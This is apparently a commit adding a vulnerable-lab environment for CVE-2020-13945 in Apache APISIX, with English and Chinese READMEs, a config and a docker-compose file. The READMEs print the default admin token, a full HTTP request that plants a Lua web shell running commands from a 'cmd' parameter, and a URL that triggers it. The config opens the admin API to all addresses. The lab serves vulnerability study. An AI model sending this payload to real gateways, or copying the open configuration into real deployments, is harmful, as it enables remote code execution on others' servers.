first commit

apisix/CVE-2020-13945/README.md

@@ -0,0 +1,59 @@
+# Apache APISIX Hardcoded API Token Leads to RCE (CVE-2020-13945)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache APISIX is a dynamic, real-time, high-performance API gateway. Apache APISIX has a default built-in API token `edd1c9f034335f136f87ad84b625c8f1` that can be used to access all the admin API, which leads to the remote LUA code execution through the `script` parameter added in the 2.x version.
+
+References:
+
+- https://apisix.apache.org/docs/apisix/getting-started
+- https://github.com/apache/apisix/pull/2244
+- https://seclists.org/oss-sec/2020/q4/187
+
+## Vulnerability Environment
+
+Execute following command to start a Apache APISIX server 2.11.0 (this vulnerability hasn't been fixed until newest version, might be not considered fixing by vendor):
+
+```
+docker compose up -d
+```
+
+After the server is started, you can see a default 404 page at `http://your-ip:9080`.
+
+## Vulnerability Reproduce
+
+Add a new evil router rule to the APISIX through admin api with default token:
+
+```
+POST /apisix/admin/routes HTTP/1.1
+Host: your-ip:9080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+Content-Type: application/json
+Content-Length: 406
+
+{
+    "uri": "/attack",
+"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
+    "upstream": {
+        "type": "roundrobin",
+        "nodes": {
+            "example.com:80": 1
+        }
+    }
+}
+```
+
+![](1.png)
+
+Then, use this evil router to execute arbitrary commands:
+
+```
+http://your-ip:9080/attack?cmd=id
+```
+
+![](2.png)

apisix/CVE-2020-13945/README.zh-cn.md

@@ -0,0 +1,57 @@
+# Apache APISIX 默认API Token导致远程Lua代码执行（CVE-2020-13945）
+
+Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`，攻击者利用这个Token可以访问到管理员接口，进而通过`script`参数来插入任意LUA脚本并执行。
+
+参考链接：
+
+- https://apisix.apache.org/docs/apisix/getting-started
+- https://github.com/apache/apisix/pull/2244
+- https://seclists.org/oss-sec/2020/q4/187
+
+## 漏洞环境
+
+执行如下命令启动一个Apache APISIX 2.11.0（这个漏洞并没有且应该不会被官方修复，所以到最新版仍然存在）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:9080`即可查看到默认的404页面。
+
+## 漏洞复现
+
+利用默认Token增加一个恶意的router，其中包含恶意LUA脚本：
+
+```
+POST /apisix/admin/routes HTTP/1.1
+Host: your-ip:9080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+Content-Type: application/json
+Content-Length: 406
+
+{
+    "uri": "/attack",
+"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
+    "upstream": {
+        "type": "roundrobin",
+        "nodes": {
+            "example.com:80": 1
+        }
+    }
+}
+```
+
+![](1.png)
+
+然后，我们访问刚才添加的router，就可以通过cmd参数执行任意命令：
+
+```
+http://your-ip:9080/attack?cmd=id
+```
+
+![](2.png)

apisix/CVE-2020-13945/config.yml

@@ -0,0 +1,34 @@
+#
+# Licensed to the Apache Software Foundation (ASF) under one or more
+# contributor license agreements.  See the NOTICE file distributed with
+# this work for additional information regarding copyright ownership.
+# The ASF licenses this file to You under the Apache License, Version 2.0
+# (the "License"); you may not use this file except in compliance with
+# the License.  You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+apisix:
+  node_listen: 9080              # APISIX listening port
+  enable_ipv6: false
+
+  allow_admin:                  # http://nginx.org/en/docs/http/ngx_http_access_module.html#allow
+    - 0.0.0.0/0              # We need to restrict ip access rules for security. 0.0.0.0/0 is for test.
+  
+  enable_control: true
+  control:
+    ip: "0.0.0.0"
+    port: 9092
+
+etcd:
+  host:                           # it's possible to define multiple etcd hosts addresses of the same etcd cluster.
+    - "http://etcd:2379"     # multiple etcd address
+  prefix: "/apisix"               # apisix configurations prefix
+  timeout: 30                     # 30 seconds

apisix/CVE-2020-13945/docker-compose.yml

@@ -0,0 +1,22 @@
+version: "2"
+
+services:
+  apisix:
+    image: vulhub/apisix:2.11.0
+    volumes:
+      - ./config.yml:/usr/local/apisix/conf/config.yaml:ro
+    depends_on:
+      - etcd
+    ports:
+      - "9080:9080"
+      - "9091:9091"
+      - "9443:9443"
+  etcd:
+    image: bitnami/etcd:3.4.15
+    environment:
+      ETCD_ENABLE_V2: "true"
+      ALLOW_NONE_AUTHENTICATION: "yes"
+      ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
+      ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
+    ports:
+      - "2379:2379/tcp"